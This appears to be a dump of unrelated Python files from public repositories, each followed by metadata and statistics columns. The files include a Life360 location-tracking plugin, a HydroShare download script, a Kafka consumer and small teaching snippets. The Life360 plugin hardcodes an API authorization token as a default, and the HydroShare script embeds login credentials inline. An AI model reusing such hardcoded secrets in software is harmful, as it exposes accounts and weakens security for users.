:return: A new ``CallStack`` instance
"""
frames = [frame]
while True:
frame = frame.f_back
if frame is None:
break
frames.append(frame)
frames.reverse()
return cls(frames)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.__frames.clear()
def __iter__(self):
return iter(self.__frames)
def __reversed__(self):
return reversed(self.__frames)
def __getitem__(self, index):
return self.__frames[index]
def __len__(self):
return len(self.__frames)
def __contains__(self, frame):
return frame in self.__frames
| 26.963855 | 156 | 0.626005 | 273 | 2,238 | 4.897436 | 0.40293 | 0.059835 | 0.02917 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001252 | 0.28597 | 2,238 | 82 | 157 | 27.292683 | 0.835419 | 0.38874 | 0 | 0.055556 | 0 | 0 | 0.028455 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.277778 | false | 0 | 0.083333 | 0.166667 | 0.638889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
ddb85f6c9f54c6a26a73cc1b1e07e1f705ce4e40 | 124 | py | Python | test_suite/suite/test09/other_mod.py | joncatanio/cannoli | 410f6bea362bf9e33eecc0e01fb080dadd14ef23 | [
"MIT"
] | 755 | 2017-12-09T05:34:43.000Z | 2022-03-26T09:15:56.000Z | test_suite/suite/test09/other_mod.py | joncatanio/cannoli | 410f6bea362bf9e33eecc0e01fb080dadd14ef23 | [
"MIT"
] | 8 | 2017-12-12T01:03:18.000Z | 2020-06-29T01:41:03.000Z | test_suite/suite/test09/other_mod.py | joncatanio/cannoli | 410f6bea362bf9e33eecc0e01fb080dadd14ef23 | [
"MIT"
] | 23 | 2018-05-17T17:48:23.000Z | 2022-03-26T09:15:57.000Z | import some_mod
def functione(b):
a = some_mod.some_class()
print(b)
print("othermod calling in " + str(a.hello))
| 17.714286 | 47 | 0.669355 | 20 | 124 | 4 | 0.7 | 0.175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.193548 | 124 | 6 | 48 | 20.666667 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0.16129 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.4 | 0.4 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
ddc39e71f4d5f6b6a53e16b07decfbb4b7887488 | 12,963 | py | Python | life360.indigoPlugin/Contents/Server Plugin/plugin.py | ryanbuckner/life360-plugin | 3e64108b91c4ee0f4f85f6e7aa31fa7bd1b1d6fe | [
"MIT"
] | 1 | 2021-09-25T15:43:00.000Z | 2021-09-25T15:43:00.000Z | life360.indigoPlugin/Contents/Server Plugin/plugin.py | ryanbuckner/life360-plugin | 3e64108b91c4ee0f4f85f6e7aa31fa7bd1b1d6fe | [
"MIT"
] | null | null | null | life360.indigoPlugin/Contents/Server Plugin/plugin.py | ryanbuckner/life360-plugin | 3e64108b91c4ee0f4f85f6e7aa31fa7bd1b1d6fe | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
####################
# Copyright (c) 2021 ryanbuckner
# https://github.com/ryanbuckner/life360-plugin/wiki
#
# Based on neilk's Solcast plugin
################################################################################
# Imports
################################################################################
import indigo
import sys
from life360 import life360
import datetime
try:
from geopy.geocoders import Nominatim
except:
self.logger.debug("Geopy python library is not found. Try reinstalling the Plugin")
pass
################################################################################
# Globals
################################################################################
################################################################################
class Plugin(indigo.PluginBase):
########################################
# Class properties
########################################
########################################
def __init__(self, pluginId, pluginDisplayName, pluginVersion, pluginPrefs):
super(Plugin, self).__init__(pluginId, pluginDisplayName, pluginVersion, pluginPrefs)
self.debug = pluginPrefs.get("showDebugInfo", False)
self.deviceList = []
try:
self.authorization_token = self.pluginPrefs.get('authorizationtoken', 'cFJFcXVnYWJSZXRyZTRFc3RldGhlcnVmcmVQdW1hbUV4dWNyRUh1YzptM2ZydXBSZXRSZXN3ZXJFQ2hBUHJFOTZxYWtFZHI0Vg')
self.username = self.pluginPrefs.get('life360_username', None)
self.password = self.pluginPrefs.get('life360_password', None)
self.refresh_frequency = self.pluginPrefs.get('refresh_frequency', 30)
self.logger.debug("Success retriving preferences from Plugin config")
except:
self.logger.error("Error retrieving Plugin preferences. Please use Configure to set")
self.logger.info(u"")
self.logger.info(u"{0:=^130}".format("Starting Life360 Plugin Engine"))
self.logger.info(u"{0:<30} {1}".format("Plugin name:", pluginDisplayName))
self.logger.info(u"{0:<30} {1}".format("Plugin version:", pluginVersion))
self.logger.info(u"{0:<30} {1}".format("Plugin ID:", pluginId))
self.logger.info(u"{0:<30} {1}".format("Refresh Frequency:", str(self.refresh_frequency) + " seconds"))
self.logger.info(u"{0:<30} {1}".format("Indigo version:", indigo.server.version))
self.logger.info(u"{0:<30} {1}".format("Python version:", sys.version.replace('\n', '')))
self.logger.info(u"{0:<30} {1}".format("Python Directory:", sys.prefix.replace('\n', '')))
self.logger.info(u"{0:=^130}".format(""))
self.life360data = {}
self.member_list = {}
########################################
def deviceStartComm(self, device):
self.logger.debug("Starting device: " + device.name)
device.stateListOrDisplayStateIdChanged()
if device.id not in self.deviceList:
self.update(device)
self.deviceList.append(device.id)
########################################
def deviceStopComm(self, device):
self.logger.debug("Stopping device: " + device.name)
if device.id in self.deviceList:
self.deviceList.remove(device.id)
########################################
def runConcurrentThread(self):
self.logger.debug("Starting concurrent thread")
try:
pollingFreq = int(self.pluginPrefs['refresh_frequency']) * 1
except:
pollingFreq = 60
self.logger.debug("Current polling frequency is: " + str(pollingFreq) + " seconds")
# Refresh device states immediately after restarting the Plugin
iterationcount = 1
try:
while True:
if (iterationcount > 1):
self.sleep(1 * pollingFreq)
self.get_new_life360json()
iterationcount += 1
for deviceId in self.deviceList:
# call the update method with the device instance
self.update(indigo.devices[deviceId])
self.updatedevicestates(indigo.devices[deviceId])
except self.StopThread:
pass
########################################
def update(self, device):
#self.logger.debug(device.name)
# # device.stateListOrDisplayStateIdChanged()
return
########################################
# UI Validate, Device Config
########################################
def validateDeviceConfigUi(self, valuesDict, typeId, device):
return (True, valuesDict)
# assigns the device.address to the value of the member.id
def menuChanged(self, valuesDict = None, typeId = None, devId = None):
self.create_member_list()
self.logger.debug(self.member_list)
if valuesDict['membername'] in self.member_list:
tempName = valuesDict['membername']
valuesDict['address'] = self.member_list[tempName] # m['id']
else:
valuesDict['address'] = "Unknown"
return valuesDict
#dump JSON to event log
def write_json_to_log(self):
if (len(self.life360data) == 0):
self.get_new_life360json()
self.logger.debug(self.life360data)
if (not self.debug):
indigo.server.log("Life360 data has been written to the debugLog. If you did not see it you may need to enable debugging in the Plugin Config UI")
return
########################################
# UI Validate, Plugin Preferences
########################################
def validatePrefsConfigUi(self, valuesDict):
if int(valuesDict['refresh_frequency']) < 15:
self.logger.error("Invalid entry for Refresh Frequency - must be greater than 15")
errorsDict = indigo.Dict()
errorsDict['refresh_frequency'] = "Invalid entry for Refresh Frequency - must be greater than 15"
return (False, valuesDict, errorsDict)
if (not valuesDict['life360_username']):
self.logger.error("Invalid entry for Life360 username - cannot be empty")
errorsDict = indigo.Dict()
errorsDict['life360_username'] = "Invalid entry for Life360 username - cannot be empty"
return (False, valuesDict, errorsDict)
if (valuesDict['life360_username'].find('@') == -1):
self.logger.error("Invalid entry for Life360 username - must be a valid email address")
errorsDict = indigo.Dict()
errorsDict['life360_username'] = "Invalid entry for Life360 username - must be a valid email address"
return (False, valuesDict, errorsDict)
if (valuesDict['life360_username'].find('.') == -1):
self.logger.error("Invalid entry for Life360 username - must be a valid email address")
errorsDict = indigo.Dict()
errorsDict['life360_username'] = "Invalid entry for Life360 username - must be a valid email address"
return (False, valuesDict, errorsDict)
if (not valuesDict['life360_password']):
self.logger.error("Invalid entry for Life360 password - cannot be empty")
errorsDict = indigo.Dict()
errorsDict['life360_password'] = "Invalid entry for Life360 password - cannot be empty"
return (False, valuesDict, errorsDict)
auth_result = self.validate_api_auth(valuesDict['life360_username'], valuesDict['life360_password'], valuesDict['authorizationtoken'])
if (not auth_result):
self.logger.error("Life360 API Authentication failed - check your username and password")
errorsDict = indigo.Dict()
errorsDict['life360_password'] = "Life360 API Authentication failed - check your username and password"
return (False, valuesDict, errorsDict)
self.debug = valuesDict['showDebugInfo']
self.logger.debug("Debug set to: " + str(self.debug))
return (True, valuesDict)
def validate_api_auth(self, username, password, authorization_token):
api = life360(authorization_token=authorization_token, username=username, password=password)
try:
if api.authenticate():
self.logger.debug("Validation of API was successful")
return True
else:
self.logger.debug("Validation of API FAILED")
return False
except Exception as e:
self.logger.debug("Error authenticating: " + e.msg)
return False
def get_member_list(self, filter="", valuesDict=None, typeId="", targetId=0):
if (len(self.member_list) == 0):
self.create_member_list()
retList = list(self.member_list.keys())
return retList
def get_new_life360json(self):
api = life360(authorization_token=self.authorization_token, username=self.username, password=self.password)
if api.authenticate():
try:
self.logger.debug("Attepting to get list of circles")
circles = api.get_circles()
id = circles[0]['id']
circle = api.get_circle(id)
self.life360data = circle
self.create_member_list()
except Exception as e:
self.logger.error(e.message)
else:
self.logger.error("Error retrieving new Life360 JSON, Make sure you have the correct credentials in Plugin Config")
return
def create_member_list(self):
if len(self.life360data) == 0:
self.get_new_life360json()
self.member_list.clear()
for m in self.life360data['members']:
self.member_list[m['firstName']] = m['id']
return
def toggleDebugging(self):
if self.debug:
self.debug = False
self.logger.info(u"Turning off debug logging (Toggle Debugging menu item chosen).")
self.pluginPrefs['showDebugInfo'] = False
else:
self.debug = True
self.pluginPrefs['showDebugInfo'] = True
self.logger.debug(u"Turning on debug logging (Toggle Debugging menu item chosen).")
############################
# Action Method
#############################
def refresh_member_data(self,pluginAction, device):
self.get_new_life360json()
self.updatedevicestates(device)
return
def isDriving(self, speed_int):
if (round(speed_int) > 1):
return 1
else:
return 0
def mphSpeed(self, speed_int):
if speed_int < 2:
return str(speed_int)
else:
return str(round(2.2 * speed_int))
def updatedevicestates(self, device):
device_states = []
member_device = device.pluginProps['membername']
member_device_address = device.address
self.logger.debug("Updating device: " + member_device)
try:
geocoder = Nominatim(user_agent='life360')
except:
self.logger.error("Error instantiating geocoder object")
pass
if self.life360data['members']:
for m in self.life360data['members']:
if ((m['id'] == member_device_address) and (m['location'])):
x = datetime.datetime.now()
cur_date_time = x.strftime("%m/%d/%Y %I:%M %p")
# the raw speed from Life360 is exstimated to be MPH/2.2
adjustedSpeed = self.mphSpeed(float(m['location']['speed']))
# the raw Life360 isDriving boolean always comes back 0. Let's use speed to determine isDriving for Indigo
adjustedDriving = self.isDriving(float(adjustedSpeed))
device_states.append({'key': 'member_id','value': m['id'] })
device_states.append({'key': 'member_avatar','value': m['avatar'] })
device_states.append({'key': 'member_first_name','value': m['firstName'] })
device_states.append({'key': 'member_last_name','value': m['lastName'] })
device_states.append({'key': 'member_phone_num','value': m['loginPhone']})
device_states.append({'key': 'member_email','value': m['loginEmail']})
device_states.append({'key': 'last_api_update','value': str(cur_date_time)})
device_states.append({'key': 'member_360_location','value': m['location']['name']})
device_states.append({'key': 'member_battery','value': m['location']['battery']})
device_states.append({'key': 'batteryLevel','value': int(float(m['location']['battery']))})
device_states.append({'key': 'member_wifi','value': m['location']['wifiState']})
device_states.append({'key': 'member_battery_charging','value': m['location']['charge']})
device_states.append({'key': 'member_in_transit','value': m['location']['inTransit']})
device_states.append({'key': 'member_driveSDKStatus','value': m['location']['driveSDKStatus']})
device_states.append({'key': 'member_lat','value': float(m['location']['latitude'])})
device_states.append({'key': 'member_long','value': float(m['location']['longitude'])})
device_states.append({'key': 'member_is_driving','value': adjustedDriving })
device_states.append({'key': 'member_speed','value': adjustedSpeed })
try:
# get address from lat long information
loclat = float(m['location']['latitude'])
loclng = float(m['location']['longitude'])
geoloc = geocoder.reverse((loclat, loclng))
currentaddress = geoloc
except Exception as g:
self.logger.debug(u"Geocoder error")
currentaddress = "-geocoder error-"
device_states.append({'key': 'member_closest_address','value': str(currentaddress) })
if (m['location']['since']):
sincedate = datetime.datetime.fromtimestamp(m['location']['since'])
sincedatestr = sincedate.strftime("%m/%d/%Y %I:%M %p")
device_states.append({'key': 'member_location_since_datetime','value': sincedatestr})
else:
device_states.append({'key': 'member_location_since_datetime','value': ''})
if (m['location']['name'] == "Home"):
device.updateStateImageOnServer(indigo.kStateImageSel.MotionSensorTripped)
else:
device.updateStateImageOnServer(indigo.kStateImageSel.None)
device.updateStatesOnServer(device_states)
else:
pass
return
| 36.931624 | 174 | 0.66011 | 1,493 | 12,963 | 5.632954 | 0.206966 | 0.045184 | 0.044946 | 0.052438 | 0.314388 | 0.245898 | 0.209275 | 0.174078 | 0.136385 | 0.091558 | 0 | 0.020093 | 0.140014 | 12,963 | 351 | 175 | 36.931624 | 0.734302 | 0.056468 | 0 | 0.268908 | 0 | 0.004202 | 0.281817 | 0.019839 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.058824 | 0.021008 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
ddd0baa5f55beee804fd811c66a9f9297112106b | 444 | py | Python | snippets/3DEM/useful_bits/scratch_hdf5_2_nii.py | michielkleinnijenhuis/EM | f46a9b11298919b359e80d9f23a7e824df1356cb | [
"Apache-2.0"
] | null | null | null | snippets/3DEM/useful_bits/scratch_hdf5_2_nii.py | michielkleinnijenhuis/EM | f46a9b11298919b359e80d9f23a7e824df1356cb | [
"Apache-2.0"
] | null | null | null | snippets/3DEM/useful_bits/scratch_hdf5_2_nii.py | michielkleinnijenhuis/EM | f46a9b11298919b359e80d9f23a7e824df1356cb | [
"Apache-2.0"
] | null | null | null | ### get all the blocked raw datafiles from ARC and convert to nifti's ###
#rsync -avz ndcn0180@arcus.arc.ox.ac.uk:/data/ndcn-fmrib-water-brain/ndcn0180/EM/M3/M3_S1_GNU/testblock/m000_?????-?????_?????-?????_?????-?????.h5 /Users/michielk/oxdata/P01/EM/M3/M3_S1_GNU/
for f in `ls m000_?????-?????_?????-?????_?????-?????.h5`; do
python $scriptdir/convert/EM_stack2stack.py ${f} ${f/.h5/.nii.gz} -i 'zyx' -l 'xyz' -e -0.0073 -0.0073 0.05 -u
done
| 74 | 191 | 0.614865 | 75 | 444 | 3.493333 | 0.76 | 0.030534 | 0.045802 | 0.061069 | 0.083969 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096059 | 0.085586 | 444 | 5 | 192 | 88.8 | 0.549261 | 0.576577 | 0 | 0 | 0 | 0 | 0.033333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
ddd71b2e4c6346f49e71518346e30e3f595d4613 | 1,169 | py | Python | lf3py/task/data.py | rog-works/lf3py | e89937f7aa133ed54d85764f06101ab9abf6b960 | [
"CNRI-Python"
] | null | null | null | lf3py/task/data.py | rog-works/lf3py | e89937f7aa133ed54d85764f06101ab9abf6b960 | [
"CNRI-Python"
] | 48 | 2020-12-19T13:47:26.000Z | 2021-01-07T22:27:56.000Z | lf3py/task/data.py | rog-works/lf3py | e89937f7aa133ed54d85764f06101ab9abf6b960 | [
"CNRI-Python"
] | null | null | null | from abc import ABCMeta, abstractmethod
from dataclasses import dataclass
from typing import Any, List, Type, TypeVar
from lf3py.lang.dsn import DSN
from lf3py.serialization.serializer import DictSerializer, Serializer
T_OBJ = TypeVar('T_OBJ')
class Command(metaclass=ABCMeta):
@property
@abstractmethod
def dsn(self) -> DSN:
raise NotImplementedError()
@abstractmethod
def data(self, data_type: Type[T_OBJ]) -> T_OBJ:
raise NotImplementedError()
class CommandQueue:
def __init__(self) -> None:
self._queue: List[Command] = []
@property
def has_next(self) -> bool:
return len(self._queue) > 0
def enqueue(self, *commands: Command):
self._queue.extend(commands)
def __iter__(self) -> 'CommandQueue':
return self
def __next__(self) -> Command:
if not self.has_next:
raise StopIteration()
task = self._queue[0]
self._queue = self._queue[1:]
return task
@dataclass
class Result:
_serializer: Serializer = DictSerializer()
def serialize(self) -> Any:
return self._serializer.serialize(self)
Ok = Result()
| 21.648148 | 69 | 0.662104 | 134 | 1,169 | 5.574627 | 0.380597 | 0.072289 | 0.026774 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005618 | 0.238666 | 1,169 | 53 | 70 | 22.056604 | 0.833708 | 0 | 0 | 0.166667 | 0 | 0 | 0.014542 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.138889 | 0.083333 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
dde5915014c5c7fff2dcda09f7e0ecc75334cecc | 398 | py | Python | downloadHSfiles.py | McDowellLab/downloadNEON | b43d47d40cbf0e168dfa307969687025e3f5fa34 | [
"MIT"
] | null | null | null | downloadHSfiles.py | McDowellLab/downloadNEON | b43d47d40cbf0e168dfa307969687025e3f5fa34 | [
"MIT"
] | null | null | null | downloadHSfiles.py | McDowellLab/downloadNEON | b43d47d40cbf0e168dfa307969687025e3f5fa34 | [
"MIT"
] | null | null | null | from hs_restclient import HydroShare, HydroShareAuthBasic
# Download LCZO sesnor database from Hydroshare
# link to the Hydroshare resource https://www.hydroshare.org/resource/b38bc00887ec45ac9499f9dea45eb8d5/
auth = HydroShareAuthBasic(username="miguelcleon", password = "x")
hs = HydroShare(auth = auth)
hs.getResource('b38bc00887ec45ac9499f9dea45eb8d5', destination='./lczodata', unzip=True)
| 39.8 | 103 | 0.81407 | 40 | 398 | 8.075 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099448 | 0.090452 | 398 | 9 | 104 | 44.222222 | 0.792818 | 0.369347 | 0 | 0 | 0 | 0 | 0.218623 | 0.129555 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.25 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
dde641d979074c8c01c9f5c1fbef8f55228ae8fe | 339 | py | Python | protonfixes/gamefixes/287260.py | bmaupin/protonfixes | 9fc87a9a487d7dfbd0c602a079f3b026f8a84638 | [
"BSD-2-Clause"
] | 213 | 2018-10-06T01:40:26.000Z | 2022-03-16T16:17:37.000Z | protonfixes/gamefixes/287260.py | bmaupin/protonfixes | 9fc87a9a487d7dfbd0c602a079f3b026f8a84638 | [
"BSD-2-Clause"
] | 88 | 2018-10-06T17:38:56.000Z | 2022-02-19T13:27:26.000Z | protonfixes/gamefixes/287260.py | bmaupin/protonfixes | 9fc87a9a487d7dfbd0c602a079f3b026f8a84638 | [
"BSD-2-Clause"
] | 67 | 2018-10-09T16:57:16.000Z | 2022-03-14T13:06:25.000Z | """ Game fix for Toybox Turbos
"""
#pylint: disable=C0103
from protonfixes import util
from protonfixes.logger import log
def main():
""" Changes the proton argument from the launcher to the game
"""
log('Applying fixes for Toybox Turbos')
# Fix infinite startup screen
util.set_environment('PROTON_NO_ESYNC', '1')
| 21.1875 | 65 | 0.707965 | 46 | 339 | 5.152174 | 0.695652 | 0.075949 | 0.126582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018382 | 0.19764 | 339 | 15 | 66 | 22.6 | 0.852941 | 0.41003 | 0 | 0 | 0 | 0 | 0.259459 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
ddea0dbcc4c809d7b5a35e5b2781bf028ff2f764 | 140 | py | Python | tests/framework/Optimizers/Infinite/infinite.py | milljm/raven | 5f29fe81b75e2ffbeb54a55aa63647e7b2f6457b | [
"Apache-2.0"
] | 2 | 2019-10-11T15:59:10.000Z | 2021-04-08T18:23:57.000Z | tests/framework/Optimizers/Infinite/infinite.py | milljm/raven | 5f29fe81b75e2ffbeb54a55aa63647e7b2f6457b | [
"Apache-2.0"
] | 1 | 2018-03-27T13:06:00.000Z | 2018-03-27T13:06:00.000Z | tests/framework/Optimizers/Infinite/infinite.py | milljm/raven | 5f29fe81b75e2ffbeb54a55aa63647e7b2f6457b | [
"Apache-2.0"
] | 1 | 2017-08-29T16:09:13.000Z | 2017-08-29T16:09:13.000Z | import numpy as np
def run(self,Inputs):
if self.x != 0.0:
self.ans = self.y/self.x
else:
self.ans = np.array([float('inf')])
| 15.555556 | 39 | 0.592857 | 26 | 140 | 3.192308 | 0.653846 | 0.120482 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018349 | 0.221429 | 140 | 8 | 40 | 17.5 | 0.743119 | 0 | 0 | 0 | 0 | 0 | 0.021583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
ddf357f8f64530a6e0a779ab33c258cb0322ac3e | 189 | py | Python | kafka/1/consumer/kaktatest.py | adriancarriger/experiments | 7e4248592dc8fbb08522c9b5f0393c80dc7e2699 | [
"MIT"
] | 1 | 2021-06-22T13:38:36.000Z | 2021-06-22T13:38:36.000Z | kafka/1/consumer/kaktatest.py | adriancarriger/experiments | 7e4248592dc8fbb08522c9b5f0393c80dc7e2699 | [
"MIT"
] | 108 | 2019-05-23T16:12:32.000Z | 2020-09-04T15:47:33.000Z | kafka/1/consumer/kaktatest.py | adriancarriger/experiments | 7e4248592dc8fbb08522c9b5f0393c80dc7e2699 | [
"MIT"
] | null | null | null | from kafka import KafkaConsumer
consumer = KafkaConsumer('myTestTopic', bootstrap_servers='localhost:9092')
for item in consumer:
print("The Message is :", item)
# https://kafka-1:9092
| 31.5 | 75 | 0.756614 | 24 | 189 | 5.916667 | 0.791667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054217 | 0.121693 | 189 | 5 | 76 | 37.8 | 0.801205 | 0.10582 | 0 | 0 | 0 | 0 | 0.245509 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fb07d1f256a2f6d7a6cc9dbdf801ef7f4558d52a | 323 | py | Python | TP_ALGO_3/convert.py | PierreLeGuen/ALGO_S5 | 9067e887d14fe997c6944292a0cff23ceda47b6e | [
"MIT"
] | null | null | null | TP_ALGO_3/convert.py | PierreLeGuen/ALGO_S5 | 9067e887d14fe997c6944292a0cff23ceda47b6e | [
"MIT"
] | null | null | null | TP_ALGO_3/convert.py | PierreLeGuen/ALGO_S5 | 9067e887d14fe997c6944292a0cff23ceda47b6e | [
"MIT"
] | null | null | null | def convert(n,base):
if n < base:
res = str(n)
else:
res = convert(n//base,base) + str(n%base)
return res
print(convert(10,2))
def convert_inv(n,base):
if n < base:
res = str(n)
else:
res = str(n%base) + convert(n//base,base)
return res
print(convert_inv(10,2))
| 16.15 | 49 | 0.544892 | 52 | 323 | 3.346154 | 0.25 | 0.229885 | 0.206897 | 0.091954 | 0.586207 | 0.298851 | 0.298851 | 0.298851 | 0.298851 | 0.298851 | 0 | 0.026549 | 0.30031 | 323 | 19 | 50 | 17 | 0.743363 | 0 | 0 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.285714 | 0.142857 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fb0b24730ac65daad4c5e515482703fc512b4066 | 300 | py | Python | output/models/nist_data/list_pkg/non_positive_integer/schema_instance/nistschema_sv_iv_list_non_positive_integer_length_1_xsd/__init__.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | 1 | 2021-08-14T17:59:21.000Z | 2021-08-14T17:59:21.000Z | output/models/nist_data/list_pkg/non_positive_integer/schema_instance/nistschema_sv_iv_list_non_positive_integer_length_1_xsd/__init__.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | 4 | 2020-02-12T21:30:44.000Z | 2020-04-15T20:06:46.000Z | output/models/nist_data/list_pkg/non_positive_integer/schema_instance/nistschema_sv_iv_list_non_positive_integer_length_1_xsd/__init__.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | null | null | null | from output.models.nist_data.list_pkg.non_positive_integer.schema_instance.nistschema_sv_iv_list_non_positive_integer_length_1_xsd.nistschema_sv_iv_list_non_positive_integer_length_1 import NistschemaSvIvListNonPositiveIntegerLength1
__all__ = [
"NistschemaSvIvListNonPositiveIntegerLength1",
]
| 50 | 233 | 0.91 | 35 | 300 | 7.057143 | 0.6 | 0.133603 | 0.218623 | 0.145749 | 0.348178 | 0.348178 | 0.348178 | 0.348178 | 0.348178 | 0 | 0 | 0.013986 | 0.046667 | 300 | 5 | 234 | 60 | 0.84965 | 0 | 0 | 0 | 0 | 0 | 0.143333 | 0.143333 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fb1aa25d697063ac5234b37a20af2edde89cf7c2 | 825 | py | Python | 2 - python intermediario/63 - iteraveis/64 - comportamento iteradores e geradores.py | AdrianaViabL/Curso-Python-udemy | a4f230354985d0f6026a1e7b4913a8f64e205654 | [
"Apache-2.0"
] | null | null | null | 2 - python intermediario/63 - iteraveis/64 - comportamento iteradores e geradores.py | AdrianaViabL/Curso-Python-udemy | a4f230354985d0f6026a1e7b4913a8f64e205654 | [
"Apache-2.0"
] | null | null | null | 2 - python intermediario/63 - iteraveis/64 - comportamento iteradores e geradores.py | AdrianaViabL/Curso-Python-udemy | a4f230354985d0f6026a1e7b4913a8f64e205654 | [
"Apache-2.0"
] | null | null | null | #lists, tuplas, strings -> sequencias -> iteraveis
nome = 'nome qualquer'
print('comportamento esperado de um valor iteravel')
print('o valor vai sempre estar la para ser exibido novamente')
for l in nome:
print(l)
print(nome)
print(10 * '=====')
iterador = iter(nome)
try: # quando mostrado x valor de um iterador, o valor nao existe mais nessa variavel
print(next(iterador)) # n
print(next(iterador)) # o
print(next(iterador)) # m
print(next(iterador)) # e
print(next(iterador))
except:
pass
print('CADE OS VALORES???')
for i in iterador:
print(i)
print('\ntrabalhando com gerador\n')
gerador = (letra for letra in nome)
print(next(gerador))
print(next(gerador))
print(next(gerador))
print(next(gerador))
print(next(gerador))
print(10 * '======')
for i in gerador:
print(i)
